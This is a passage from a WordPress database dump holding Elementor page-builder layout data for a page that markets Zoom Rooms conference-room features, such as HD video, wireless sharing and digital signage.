"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc6dcbe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2576d197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f0691d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Zoom for the\\u00a0Conference Room<\\/h3>\\r\\n<h4>Simple, flexible set up<\\/h4>\\r\\nBuild the room you need with the hardware you want on top on Zoom\\u2019s cloud-based platform.\\r\\n<h4>Modern capabilities<\\/h4>\\r\\nDeploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.\\r\\n<h4>Happy, productive users<\\/h4>\\r\\nWe focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.\\r\\n\\r\\n&nbsp;\\r\\n<h3>Capabilities that enhance the way people work<\\/h3>\\r\\n<h4 class=\\\"mb-1 mt-0\\\">HD video and audio<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Bring high quality video, audio, and web conferencing to your existing rooms.<\\/p>\\r\\n\\r\\n<h4 class=\\\"mb-1 mt-0\\\">Wireless sharing<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.<\\/p>\\r\\n\\r\\n<h4 class=\\\"mb-1 mt-0\\\">Interoperability with any video system<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Communicate with existing SIP or H.323 systems<\\/p>\\r\\n\\r\\n<h4 class=\\\"mb-1 mt-0\\\">Meet with anyone<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Include remote participants on desktop, mobile, or other conference room systems.<\\/p>\\r\\n\\r\\n<h4 class=\\\"mb-1 mt-0\\\">One touch to start meetings<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.<\\/p>\\r\\n\\r\\n<h4 class=\\\"mb-1 mt-0\\\">Centralized management<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Get the overview status and management of deployed conference rooms in a single admin console.<\\/p>\\r\\n&nbsp;\\r\\n<h3>Already have an existing video conference room system?<\\/h3>\\r\\nUse Zoom\\u2019s Conference Room Connector to extend your standards-based conference systems to the cloud. Zoom\\u2019s Conference Room Connector helps organizations leverage existing products through its life-cycle while delivering a consistent and unified communication experience.\\r\\n\\r\\n&nbsp;\\r\\n<h3>Zoom Rooms includes the following value-added services at no additional cost.<\\/h3>\\r\\n<h4>Digital Signage<\\/h4>\\r\\nDigital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.\\r\\n<ul>\\r\\n \\t<li>Leverage room displays when not in use<\\/li>\\r\\n \\t<li>Manage displays at scale or individually<\\/li>\\r\\n \\t<li>Unlimited amount of displays supported (both in and out of conference rooms)<\\/li>\\r\\n<\\/ul>\\r\\n<h4>Scheduling Display<\\/h4>\\r\\nEnd scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.\\r\\n<h4>Make interactive collaboration easy with touch screens<\\/h4>\\r\\nPower up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation all at the tip of your fingers.\\r\\n<h4>Flawless video conferencing for every space<\\/h4>\\r\\nUnleash the power of cloud-based video conferencing anywhere work gets done.\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6154,1620,'_elementor_version','0.4'),(6170,3051,'_elementor_version','0.4'),(6188,3054,'_wp_page_template','template-fullwidth.php'),(6189,3054,'_elementor_edit_mode','builder'),(6190,3054,'_elementor_template_type','post'),(6191,3054,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(6192,3054,'_elementor_data','[{\"id\":\"cad15a9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5c7499\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"96a0357\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom for the Conference Room<\\/h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6457ddc\",\"elType\":\"section\",\"settings\":{\"structure\":\"33\"},\"elements\":[{\"id\":\"bdc71a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3abc915\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1901198\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/YeFIZXCYa5A\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"bcb7227\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66635b2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[{\"id\":\"1e75488\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5affd82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simple, flexible set up<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">Build the room you need with the hardware you want on top on Zoom\\u2019s cloud-based platform.<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d999cea\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6757f8b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modern capabilities<\\/h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b51dbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ff854f8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Happy, productive users<\\/h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"faaa0fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/Zoom-Conference-Room-Solutions_page2_image7.jpg\",\"id\":3048},\"background_position\":\"center center\",\"background_attachment\":\"scroll\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"886f41b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"a8a224a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">HD video and audio<\\/h4><p class=\\\"mt-1 mb-5\\\">Bring high quality video, audio, and web conferencing to your existing rooms.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"412feda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Wireless sharing<\\/h4><p class=\\\"mt-1 mb-5\\\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3d2b744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Interoperability with any video system<\\/h4><p class=\\\"mt-1 mb-5\\\">Communicate with existing SIP or H.323 systems<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a34735d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"isInner\":false},{\"id\":\"ab89310\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"fcc54ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Meet with anyone<\\/h4><p class=\\\"mt-1 mb-5\\\">Include remote participants on desktop, mobile, or other conference room systems.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3c1657b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">One touch to start meetings<\\/h4><p class=\\\"mt-1 mb-5\\\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet